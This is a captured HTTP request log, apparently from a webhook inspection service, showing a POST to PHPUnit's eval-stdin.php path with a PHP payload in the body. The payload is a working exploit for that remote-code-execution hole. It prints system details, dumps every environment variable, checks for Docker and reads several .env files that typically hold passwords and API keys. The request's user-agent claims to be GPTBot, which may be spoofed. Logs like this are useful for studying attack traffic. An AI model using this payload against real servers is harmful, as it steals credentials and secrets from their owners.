Request Details
Name Value

Path

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Host

everlasting-akubra-711.webhook.edoktest.pl

Method

POST

Remote ip

::ffff:172.18.0.2

Remote port

58708

Http version

HTTP/1.1

Body length

368

Headers
Name Value

accept

*/*

accept-encoding

gzip

content-length

368

content-type

application/x-www-form-urlencoded

host

everlasting-akubra-711.webhook.edoktest.pl

user-agent

Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)

x-forwarded-for

34.172.211.67

x-forwarded-host

everlasting-akubra-711.webhook.edoktest.pl

x-forwarded-port

443

x-forwarded-proto

https

x-forwarded-server

937445e12dc9

x-real-ip

34.172.211.67

Body
  
  <?php echo "GSCAN_BEGIN\n"; echo "===id===\n".php_uname()."\n";echo "===printenv===\n"; foreach($_ENV as $k=>$v){echo "$k=$v\n";}if(file_exists("/.dockerenv"))echo "DOCKER=1\n";echo "===dotenv===\n"; foreach(array(".env",".env.local",".env.production","app/.env") as $f){if(is_file($f)){echo "# $f\n".substr(@file_get_contents($f),0,3000)."\n";}}echo "\nGSCAN_END"; ?>